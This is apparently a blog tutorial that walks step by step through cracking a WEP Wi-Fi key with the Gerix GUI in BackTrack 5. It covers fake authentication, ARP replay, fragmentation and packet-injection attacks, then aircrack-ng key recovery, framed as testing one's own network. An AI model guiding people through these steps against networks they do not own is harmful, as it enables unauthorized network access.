I will not loose your time with any of the aircrack-ng suite commands, or useless jabber when there are so good GUI programs nowadays that handle ALL the commands. One of these programs is the Gerix Wifi Cracker which is incorporated in Bactrack5′s utility arsenal.
Before we being we have to note one huge thing - Does our wireless adapter support injection ? The answer of this question is pretty well handled here. What injection gives us – is the ability to use some EXTRA aircrack attacks to speed up the process of WEP cracking. So don’t worry too much if your card can’t handle injection – take a look at the end of the post to see how to do it without any injection.
So our first step is to run Gerix Wifi Cracker – Go to your Backtrack applications menu -> Backtrack -> Exploitation tools -> Wireless exploitation -> WLAN Exploitation -> gerix-wifi-cracker-ng. A window should pop up with the actual application. The next step we need to undertake is select our interface and put it in monitor mode – this is achieved by going to the Configuration menu and selecting our interface (usually wlan0) and clicking on Enable/Disable Monitor mode.
Select the newly created mon0 interface (this is the monitor mode of your wireless card). Next scroll down (if needed) and set Channels to “all channels” and Seconds to 10 and click Rescan networks. Obivously wait 10 seconds, and a list of wireless networks will appear – find YOUR network that you are doing this test on – on Enc tab it HAS TO SAY WEP – as that is the encryption we will be breaking today.
Once the network is selected move to the WEP Tab in the program. Click on “Start sniffing and Logging” and leave the terminal open. Now here is where it becomes a little tricky. It is important to know if the network you have selected has clients connected to it – if there are clients connected it goes much faster and smoother. You cans see in the terminal that just popped if there are any clients – if there are MAC addresses under STATION – then there are clients connected, or to put it simpler – if there are any other MAC addresses beside the one of the target’s – there most likely are clients associated with it.
You can see here that there is a connected client under Stations, the #Data is still only 7 and the ENC/CIPHER are WEP.
If there ARE clients select the WEP Attacks (with clients). There you click on “Associate with AP using fake auth”, wait a few seconds and click on “ARP request replay”. Thats pretty much it – keep track of the first terimnal that you left open – once it reaches a Data number over 10 000 – you are ready to TRY (don’t close any of the windows yet) and crack the key – go to the Cracking tab and click on “Aircrack-ng – Decrypt WEP password” which is under Wep Cracking. Wait and see what happens – either it shows you the WEP key of the network or asks you to try in another 5000 IVs. If its the second, just wait like 5000 more IVs (thats the number under Data on the first terminal) and repeat.
If there AREN’T clients the process takes a bit longer. Head to WEP Attacks (no-client). Here there are 2 choices – fragmentation and ChopChop. Fragmentation is usually the quicker, but it doesn’t work with all cards. For the sake of keeping this post not that long I will just explain the Fragmentation attack. Click on “Associate with AP using fake auth”.
Wait a few seconds and click on “Fragmentation attack” and wait until a message saying “Now you can build a packet with packetforge-ng out of that 1500 bytes keystream”. It might take a while so give it a chance. If it doesn’t appear for 4-5 minutes – attack has failed – you can try doing a chopchop attack. If successful you can move on to clicking “Create the ARP packet to be injected on the victim access point”. Wait a second and click on “Inject the created packet on victim access point”. A window will popup that starts sending packets to the target and generates #Data. Once again, as you reach a number over 10 000 under Data you are free to try to crack the password from the Cracking tab. Note you can perform this even if there are clients connected, though its slower than the first method.
The last and slowest method is doing this without a wireless card that supports injection. What you need to do here is simply use the “Start Sniffling and Logging” functionality under WEP and stay and watch. Once again – #Data must reach over 10 000 and then attempt to crack. The problem is this might take from 5 minutes to 5 days so to speak as the traffic will be entirely generated by the actual users of the network – if there are no clients – you will possibly never crack it.
Next post will be about WPA/WPA2 cracking with pyrit and rainbows